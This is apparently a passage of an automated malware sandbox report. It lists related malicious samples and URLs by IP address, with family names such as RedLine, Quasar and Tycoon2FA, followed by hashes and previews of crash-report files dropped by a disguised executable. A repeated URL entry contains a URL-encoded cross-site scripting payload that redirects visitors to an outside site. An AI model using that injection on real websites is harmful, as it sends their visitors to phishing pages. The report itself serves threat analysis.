                • 104.26.12.205
                Prismifyr-Install.exeGet hashmaliciousNode StealerBrowse
                • 104.26.13.205
                Prismifyr-Install.exeGet hashmaliciousNode StealerBrowse
                • 104.26.12.205
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                CLOUDFLARENETUSGlobalfoundries.com_Report_46279.pdfGet hashmaliciousHTMLPhisherBrowse
                • 188.114.96.3
                http://fpnc.vnvrff.com/Get hashmaliciousUnknownBrowse
                • 188.114.96.3
                https://www.florenceco.org/offices/elected/solicitor/docket.php?area=florence%22%3E%3C%69%6D%67%20%73%72%63%3D%22%69%6D%61%67%65%2E%6A%70%67%22%20%6F%6E%65%72%72%6F%72%3D%22%76%61%72%20%75%72%6C%31%20%3D%20%5B%27%68%74%74%27%2C%27%70%3A%2F%2F%67%27%2C%27%6F%27%2C%27%6F%67%27%2C%27%6C%65%2E%63%27%2C%27%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%20%76%61%72%20%75%72%6C%32%20%3D%20%5B%27%68%74%74%27%2C%27%70%3A%2F%2F%67%27%2C%27%6F%27%2C%27%6F%67%27%2C%27%6C%65%2E%63%27%2C%27%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%76%61%72%20%75%72%6C%20%3D%20%5B%27%68%74%27%2C%27%74%70%27%2C%27%73%3A%2F%2F%76%27%2C%27%61%75%6C%27%2C%27%74%64%6F%27%2C%27%72%65%73%2E%63%27%2C%27%6F%6D%2F%30%2F%27%2C%27%30%2F%30%2F%27%2C%27%34%33%66%66%27%2C%27%35%63%62%35%27%2C%27%63%36%27%2C%27%32%65%27%2C%27%32%66%38%64%31%27%2C%27%31%63%61%33%38%38%27%2C%27%65%34%37%35%62%36%27%2C%27%63%34%36%2F14/392-16513/1254-3178-27524%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%20%75%72%6C%20%3D%20%75%72%6C%2E%72%65%70%6C%61%63%65%28%2F%2C%2F%67%2C%20%27%27%29%3B%20%76%61%72%20%77%69%6E%20%3D%20%77%69%6E%64%6F%77%2E%6F%70%65%6E%28%75%72%6C%2C%20%27%5F%73%65%6C%66%27%29%3B%20%77%69%6E%2E%6F%70%65%6E%65%72%20%3D%20%6E%75%6C%6C%3B%20%77%69%6E%2E%6C%6F%63%61%74%69%6F%6E%2E%72%65%70%6C%61%63%65%28%75%72%6C%29%3B%22%3EGet hashmaliciousPhisherBrowse
                • 188.114.96.3
                https://porn-app.com/download2Get hashmaliciousHTMLPhisherBrowse
                • 188.114.96.3
                https://perweierscotish.online/Get hashmaliciousHtmlDropperBrowse
                • 188.114.96.3
                Play_VM-NowCWhiteAudiowav012.htmlGet hashmaliciousTycoon2FABrowse
                • 188.114.96.3
                deveba=.htmlGet hashmaliciousUnknownBrowse
                • 104.17.25.14
                https://orv-moers.powerappsportals.com/Get hashmaliciousHtmlDropperBrowse
                • 104.18.3.157
                https://www.kisa.link/dANpzGet hashmaliciousPhisherBrowse
                • 104.21.72.51
                Remittance_10_0224.htmlGet hashmaliciousHTMLPhisherBrowse
                • 104.17.24.14
                CLOUDFLARENETUSGlobalfoundries.com_Report_46279.pdfGet hashmaliciousHTMLPhisherBrowse
                • 188.114.96.3
                http://fpnc.vnvrff.com/Get hashmaliciousUnknownBrowse
                • 188.114.96.3
                https://www.florenceco.org/offices/elected/solicitor/docket.php?area=florence%22%3E%3C%69%6D%67%20%73%72%63%3D%22%69%6D%61%67%65%2E%6A%70%67%22%20%6F%6E%65%72%72%6F%72%3D%22%76%61%72%20%75%72%6C%31%20%3D%20%5B%27%68%74%74%27%2C%27%70%3A%2F%2F%67%27%2C%27%6F%27%2C%27%6F%67%27%2C%27%6C%65%2E%63%27%2C%27%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%20%76%61%72%20%75%72%6C%32%20%3D%20%5B%27%68%74%74%27%2C%27%70%3A%2F%2F%67%27%2C%27%6F%27%2C%27%6F%67%27%2C%27%6C%65%2E%63%27%2C%27%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%76%61%72%20%75%72%6C%20%3D%20%5B%27%68%74%27%2C%27%74%70%27%2C%27%73%3A%2F%2F%76%27%2C%27%61%75%6C%27%2C%27%74%64%6F%27%2C%27%72%65%73%2E%63%27%2C%27%6F%6D%2F%30%2F%27%2C%27%30%2F%30%2F%27%2C%27%34%33%66%66%27%2C%27%35%63%62%35%27%2C%27%63%36%27%2C%27%32%65%27%2C%27%32%66%38%64%31%27%2C%27%31%63%61%33%38%38%27%2C%27%65%34%37%35%62%36%27%2C%27%63%34%36%2F14/392-16513/1254-3178-27524%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%20%75%72%6C%20%3D%20%75%72%6C%2E%72%65%70%6C%61%63%65%28%2F%2C%2F%67%2C%20%27%27%29%3B%20%76%61%72%20%77%69%6E%20%3D%20%77%69%6E%64%6F%77%2E%6F%70%65%6E%28%75%72%6C%2C%20%27%5F%73%65%6C%66%27%29%3B%20%77%69%6E%2E%6F%70%65%6E%65%72%20%3D%20%6E%75%6C%6C%3B%20%77%69%6E%2E%6C%6F%63%61%74%69%6F%6E%2E%72%65%70%6C%61%63%65%28%75%72%6C%29%3B%22%3EGet hashmaliciousPhisherBrowse
                • 188.114.96.3
                https://porn-app.com/download2Get hashmaliciousHTMLPhisherBrowse
                • 188.114.96.3
                https://perweierscotish.online/Get hashmaliciousHtmlDropperBrowse
                • 188.114.96.3
                Play_VM-NowCWhiteAudiowav012.htmlGet hashmaliciousTycoon2FABrowse
                • 188.114.96.3
                deveba=.htmlGet hashmaliciousUnknownBrowse
                • 104.17.25.14
                https://orv-moers.powerappsportals.com/Get hashmaliciousHtmlDropperBrowse
                • 104.18.3.157
                https://www.kisa.link/dANpzGet hashmaliciousPhisherBrowse
                • 104.21.72.51
                Remittance_10_0224.htmlGet hashmaliciousHTMLPhisherBrowse
                • 104.17.24.14
                CLOUDFLARENETUSGlobalfoundries.com_Report_46279.pdfGet hashmaliciousHTMLPhisherBrowse
                • 188.114.96.3
                http://fpnc.vnvrff.com/Get hashmaliciousUnknownBrowse
                • 188.114.96.3
                https://www.florenceco.org/offices/elected/solicitor/docket.php?area=florence%22%3E%3C%69%6D%67%20%73%72%63%3D%22%69%6D%61%67%65%2E%6A%70%67%22%20%6F%6E%65%72%72%6F%72%3D%22%76%61%72%20%75%72%6C%31%20%3D%20%5B%27%68%74%74%27%2C%27%70%3A%2F%2F%67%27%2C%27%6F%27%2C%27%6F%67%27%2C%27%6C%65%2E%63%27%2C%27%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%20%76%61%72%20%75%72%6C%32%20%3D%20%5B%27%68%74%74%27%2C%27%70%3A%2F%2F%67%27%2C%27%6F%27%2C%27%6F%67%27%2C%27%6C%65%2E%63%27%2C%27%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%76%61%72%20%75%72%6C%20%3D%20%5B%27%68%74%27%2C%27%74%70%27%2C%27%73%3A%2F%2F%76%27%2C%27%61%75%6C%27%2C%27%74%64%6F%27%2C%27%72%65%73%2E%63%27%2C%27%6F%6D%2F%30%2F%27%2C%27%30%2F%30%2F%27%2C%27%34%33%66%66%27%2C%27%35%63%62%35%27%2C%27%63%36%27%2C%27%32%65%27%2C%27%32%66%38%64%31%27%2C%27%31%63%61%33%38%38%27%2C%27%65%34%37%35%62%36%27%2C%27%63%34%36%2F14/392-16513/1254-3178-27524%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%20%75%72%6C%20%3D%20%75%72%6C%2E%72%65%70%6C%61%63%65%28%2F%2C%2F%67%2C%20%27%27%29%3B%20%76%61%72%20%77%69%6E%20%3D%20%77%69%6E%64%6F%77%2E%6F%70%65%6E%28%75%72%6C%2C%20%27%5F%73%65%6C%66%27%29%3B%20%77%69%6E%2E%6F%70%65%6E%65%72%20%3D%20%6E%75%6C%6C%3B%20%77%69%6E%2E%6C%6F%63%61%74%69%6F%6E%2E%72%65%70%6C%61%63%65%28%75%72%6C%29%3B%22%3EGet hashmaliciousPhisherBrowse
                • 188.114.96.3
                https://porn-app.com/download2Get hashmaliciousHTMLPhisherBrowse
                • 188.114.96.3
                https://perweierscotish.online/Get hashmaliciousHtmlDropperBrowse
                • 188.114.96.3
                Play_VM-NowCWhiteAudiowav012.htmlGet hashmaliciousTycoon2FABrowse
                • 188.114.96.3
                deveba=.htmlGet hashmaliciousUnknownBrowse
                • 104.17.25.14
                https://orv-moers.powerappsportals.com/Get hashmaliciousHtmlDropperBrowse
                • 104.18.3.157
                https://www.kisa.link/dANpzGet hashmaliciousPhisherBrowse
                • 104.21.72.51
                Remittance_10_0224.htmlGet hashmaliciousHTMLPhisherBrowse
                • 104.17.24.14
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                3b5074b1b5d032e5620f69f9f700ff0eMZs41xJfcH.exeGet hashmaliciousPureLog Stealer, Quasar, zgRATBrowse
                • 104.21.54.163
                http://www.sunsetsafaris.com.au//homeGet hashmaliciousUnknownBrowse
                • 104.21.54.163
                N5mRSBWm8P.exeGet hashmaliciousQuasarBrowse
                • 104.21.54.163
                http://fpnc.vnvrff.com/Get hashmaliciousUnknownBrowse
                • 104.21.54.163
                tcU5sAPsAc.exeGet hashmaliciousRedLineBrowse
                • 104.21.54.163
                file.exeGet hashmaliciousCredential FlusherBrowse
                • 104.21.54.163
                https://ca.docusign.net/Signing/EmailStart.aspx?a=ef028e9a-a228-415f-bf68-f187538d8e48&etti=24&acct=5c5d7412-9cb5-4dbf-8a78-52c1b2a30ce5&er=96c6e932-7bdc-4ccf-8eb1-c3c23bac63dcGet hashmaliciousUnknownBrowse
                • 104.21.54.163
                okLjQnQIef.exeGet hashmaliciousDCRatBrowse
                • 104.21.54.163
                file.exeGet hashmaliciousCredential FlusherBrowse
                • 104.21.54.163
                9rSeCZbjZE.msiGet hashmaliciousAteraAgentBrowse
                • 104.21.54.163
                No context
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                Category:modified
                Size (bytes):65536
                Entropy (8bit):0.9153513922870263
                Encrypted:false
                SSDEEP:96:M++FIu5bSYUXehHKQlUUyx9OxQXIDcQvc6QcEVcw3cE/n+BHUHZopAnQHdE7HeS8:b+dFSYhy70BU/Ka6IkzuiFTZ24IO86
                MD5:3EB9053ED523D250DAC42C3DAC26CA92
                SHA1:4B143BA1604A13CF30BCBC27F585DBC19E392364
                SHA-256:7E7AFEEDECDD9D797EF0289EC387BC2E61B0E953760F92CFA92C284B6628F57B
                SHA-512:44F34BE97157692EB8A04C2BB0DA5EB22F92340FB6F0DCD41C5F3C93D99BE38BC653D6E840C2083F51D983FA711380F1E20019901F7AD745CCADE8283CEBB6C2
                Malicious:false
                Reputation:low
                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.3.9.2.4.0.8.5.3.1.3.8.3.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.3.9.2.4.0.8.9.8.4.5.0.4.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.9.5.a.d.b.7.9.-.7.e.3.b.-.4.a.3.9.-.a.5.b.7.-.9.0.4.8.b.6.b.6.4.8.d.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.9.d.e.b.0.2.d.-.4.3.c.8.-.4.0.1.5.-.9.c.7.8.-.0.4.8.f.6.9.5.d.c.4.2.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.G.o.o.g.l.e.U.p.d.a.t.e.r...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.L.K.S.M...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.8.8.-.0.0.0.1.-.0.0.1.5.-.6.9.d.8.-.9.1.5.0.3.3.1.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.4.e.d.6.8.4.d.6.0.8.1.f.b.4.8.6.d.b.9.e.f.7.f.1.0.f.a.c.3.7.0.0.0.0.0.0.0.0.0.!.0.0.0.0.f.a.c.a.a.9.3.a.6.1.9.a.b.8.7.d.a.8.a.c.4.4.8.d.d.1.f.c.7.1.f.b.7.2.e.5.3.
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                Category:dropped
                Size (bytes):65536
                Entropy (8bit):0.915309316314002
                Encrypted:false
                SSDEEP:96:pIvFZibSYUXe7THKQlUUyx9OxQXIDcQvc6QcEVcw3cE/n+BHUHZopAnQHdE7HeSc:irmSYvy70BU/Ka6IkzuiFTZ24IO86
                MD5:067A82047BBF496AA73784A7B205BD13
                SHA1:0898A223BC53080EA5C2E9E7294046D3A1D07112
                SHA-256:54393EC2AC3C39BDBBCE2E339A95D0B355E85478F280655DD6538752FB414C10
                SHA-512:12D945D41F71F16744EC10CAE806296C9FC87B5E50FF37755A875F91722EABEE554A02A28DDF20F0F5CA1483D5AC549C1E8514D3920374DF0F6DBC0232F15CC6
                Malicious:false
                Reputation:low
                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.3.9.2.3.9.1.7.6.0.5.6.5.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.3.9.2.3.9.2.6.3.5.5.6.5.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.3.4.2.2.d.0.0.-.4.5.8.8.-.4.3.6.3.-.a.c.2.c.-.1.9.4.8.8.5.5.2.1.5.e.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.d.9.8.6.0.3.b.-.4.6.a.7.-.4.f.e.2.-.a.3.2.a.-.9.b.c.c.5.3.b.6.5.7.e.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.G.o.o.g.l.e.U.p.d.a.t.e.r...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.L.K.S.M...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.3.7.4.-.0.0.0.1.-.0.0.1.5.-.4.9.5.7.-.b.5.4.6.3.3.1.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.4.e.d.6.8.4.d.6.0.8.1.f.b.4.8.6.d.b.9.e.f.7.f.1.0.f.a.c.3.7.0.0.0.0.0.0.0.0.0.!.0.0.0.0.f.a.c.a.a.9.3.a.6.1.9.a.b.8.7.d.a.8.a.c.4.4.8.d.d.1.f.c.7.1.f.b.7.2.e.5.3.
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                Category:dropped
                Size (bytes):65536
                Entropy (8bit):0.9120541569106146
                Encrypted:false
                SSDEEP:96:ZfFrsVbSCDjHPQlUUyx9OxQXIDcQvc6QcEVcw3cE/X+BHUHZopAnQHdE7HeS9+xs:RRsJSIjX70BU/aa6IkzuiFTZ24IO8H
                MD5:AC15F7CEE55A2CAF7495C32A2FCC2EAA
                SHA1:2E735E47EF700B3557F3CB2BB6DD2552E8451D99
                SHA-256:51EA34A64F9538D3D77D8B08E3C3B1F50B62F171BD9F87C1E997A18C3D810470
                SHA-512:031117CBD90D1A66525467E7D0FEC3685EE43D80C4CAA292C5F5962F67D6937BBA457757D106A1AEC3CCD92B24561690A1236713046A2B7832F869EF88DA0538
                Malicious:false
                Reputation:low
                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.3.9.2.4.0.0.6.1.4.6.7.6.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.3.9.2.4.0.1.2.8.6.5.2.6.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.0.1.a.8.1.a.e.-.3.8.1.a.-.4.3.6.2.-.8.e.b.5.-.6.f.9.9.d.9.c.f.d.a.e.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.2.3.7.4.b.7.d.-.7.4.7.c.-.4.c.2.b.-.a.1.b.f.-.a.2.9.3.b.a.2.b.b.c.6.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.L.K.M.S.e.r.v.i.c.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.L.K.S.M...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.c.8.-.0.0.0.1.-.0.0.1.5.-.0.f.b.f.-.a.e.4.b.3.3.1.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.4.e.d.6.8.4.d.6.0.8.1.f.b.4.8.6.d.b.9.e.f.7.f.1.0.f.a.c.3.7.0.0.0.0.0.0.0.0.0.!.0.0.0.0.f.a.c.a.a.9.3.a.6.1.9.a.b.8.7.d.a.8.a.c.4.4.8.d.d.1.f.c.7.1.f.b.7.2.e.5.3.8.0.e.
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                Category:dropped
                Size (bytes):65536
                Entropy (8bit):0.9122150912958615
                Encrypted:false
                SSDEEP:192:/7SdPSIOsX70BU/aa6IkzuiFTZ24IO8H:wPSIdYBU/aaVkzuiFTY4IO8H
                MD5:47D0BA9DE4BC70C9B8F24D8E26B420FA
                SHA1:F2929D8C1354612252A5EC9431F2061505207960
                SHA-256:1E37BCEEBCC176AE0D36C2C4A76177044AB2D2904BFB2E53298627CC19B45C5A
                SHA-512:8207CF50CED570D2D3449F198E4B95DA8BFB4F799680C6F287BE77B863150813DA420D08A60E2E88B5879B1DF7F1AABA8DF6565F40F2BCD41A0BF4FA2FE812A0
                Malicious:false
                Reputation:low
                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.3.9.2.3.8.3.8.6.6.2.7.3.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.3.9.2.3.8.4.8.8.1.8.8.9.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.3.f.0.a.0.5.f.-.2.c.d.f.-.4.b.3.8.-.9.4.7.a.-.1.1.4.0.9.0.0.0.4.9.1.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.a.5.b.4.b.3.5.-.9.4.e.a.-.4.7.e.f.-.a.5.d.e.-.c.0.8.0.b.3.5.f.6.3.2.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.L.K.M.S.e.r.v.i.c.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.L.K.S.M...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.6.4.-.0.0.0.1.-.0.0.1.5.-.5.6.1.e.-.e.3.4.1.3.3.1.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.4.e.d.6.8.4.d.6.0.8.1.f.b.4.8.6.d.b.9.e.f.7.f.1.0.f.a.c.3.7.0.0.0.0.0.0.0.0.0.!.0.0.0.0.f.a.c.a.a.9.3.a.6.1.9.a.b.8.7.d.a.8.a.c.4.4.8.d.d.1.f.c.7.1.f.b.7.2.e.5.3.8.0.e.
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:Mini DuMP crash report, 15 streams, Thu Oct 3 01:26:24 2024, 0x1205a4 type
                Category:dropped
                Size (bytes):195044
                Entropy (8bit):4.124697449362486
                Encrypted:false
                SSDEEP:1536:lMC45xTI2hCDltTkM/Cd9MFvuBojRApN4uE2aO4aX7kjk/EOLTgdiDziSVXEKfAq:lb4z82kzXn24uEq48EOLTgd0iyULfs
                MD5:1F5B689970D0D923FCA0E381A89B7D55
                SHA1:83E30EB26157B58FC78D15BCDCC7DD0FC32B922D
                SHA-256:CF9B2E194A01112050BFEF57B1D393766C61F8ABD0C478836935FFB3E1BC65A9
                SHA-512:7E174B8D78D9E956D35F188586B3015F27D34638B05E6D8AEA12DBDB5A89EE9C4DFD1866732953EDBA1F23EF0B39DD84ECDEE340B8F14437C50FE19F24A7A52A
                Malicious:false
                Reputation:low
                Preview:MDMP..a..... ..........f....................................$...........T!...:..........`.......8...........T............$..........................................................................................................eJ......8.......GenuineIntel............T.......d......f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                Category:dropped
                Size (bytes):8396
                Entropy (8bit):3.6917814099613753
                Encrypted:false
                SSDEEP:192:R6l7wVeJJK6zte6Y2D1SU91YgmfZbhnYpr189bfksfq6Vm:R6lXJU6g6YISU91Ygmf1JfXfS
                MD5:B0980434FFBDAA762C95665F066DD843
                SHA1:A27F328F6182E91DA52D854F3C9052D1CFAE1C17
                SHA-256:BB6318A9ABD2FF02F12C48796ED88AFC17111F29AA9122FEC6245F26E0177D83
                SHA-512:2B2FC202D202630EC16D3B848DCDA394A146492A77DD4AB7B9D60D4424B53030304452B185115A67CF1EA11AA6235ED338181E80114CAD7CF354BE215BEDDA4A
                Malicious:false
                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.1.7.2.<./.P.i.
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):4751
                Entropy (8bit):4.466342739508
                Encrypted:false
                SSDEEP:48:cvIwWl8zsnJg77aI9EHWpW8VYBPYm8M4JcgHEO7Fvu+q8vCHEOmvBb7EA77d:uIjfJI7C27V8SJcgkYuKCk9V7T77d
                MD5:65D10AB8B007478771713CB7E4DD09FD
                SHA1:6A5BE053C4B460914B6EB77F9115320513B6B2F9
                SHA-256:CC7E17F35542B5B69FE0F29F8691DAD242021AAEACB463377D51B2E2AEA96FBB
                SHA-512:746708497B69A8A704BD4CD71DB67FCC73D7F6F9EEC599AEE6A38DA064BCB9771B342CAF53EFF4C9587D994D366B80EB42E8E51DDD9F17545CABE45F585E4757
                Malicious:false
                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="526589" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:Mini DuMP crash report, 15 streams, Thu Oct 3 01:26:32 2024, 0x1205a4 type
                Category:dropped
                Size (bytes):194788
                Entropy (8bit):4.099616745804321
                Encrypted:false
                SSDEEP:3072:wc/Z3SaHmq64g10gCIj4uEqZkplLTg0yzz:wc/Z3XH/Q1EIj43HTg0yz
                MD5:A87D164EB4D7C0A06D93F09DA3B95093
                SHA1:C050286F1A15E2D83F6F53A87DF9431E14132DD0
                SHA-256:9AFFA88AD036DF05ECD73AAE7F8FE796023BF3176FCA6E7B65D4D60054632FE9
                SHA-512:A88DCD806A44D8EC907B60E4C3CFD285D61E98C8CBECC72633D932A7BC409078DE830E95D568EA5834941FF950A7A580A38C7C6C582A286DAD0C28F0392A3D7B
                Malicious:false
                Preview:MDMP..a..... ..........f....................................$...........d!...:..........`.......8...........T............$..........................................................................................................eJ......8.......GenuineIntel............T.......t......f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                Category:dropped
                Size (bytes):8402
                Entropy (8bit):3.690156883829524
                Encrypted:false
                SSDEEP:192:R6l7wVeJXs6E6Y2DZSUR8gmfZkhnYprM89bYesftom:R6lXJ86E6YESUR8gmfmSYdfH
                MD5:0E8D6A706CC3473569A47CC5343BB249
                SHA1:229E57A24CC93AF0305CEFA74A24AC64D26A385F
                SHA-256:F75F4CB627DFFCCCA6F215C523642A73CF9638A768AFB3C8BDC9DA14B99D6DA2
                SHA-512:BB43E9BF04E684D7214F34FCEC96074006528D5A6025A6243D25D0B8EBFFE7324FE9E0B727594C55E584C8AEED8AE73A22EBA137E0FF92285165DDD17AD7480C
                Malicious:false
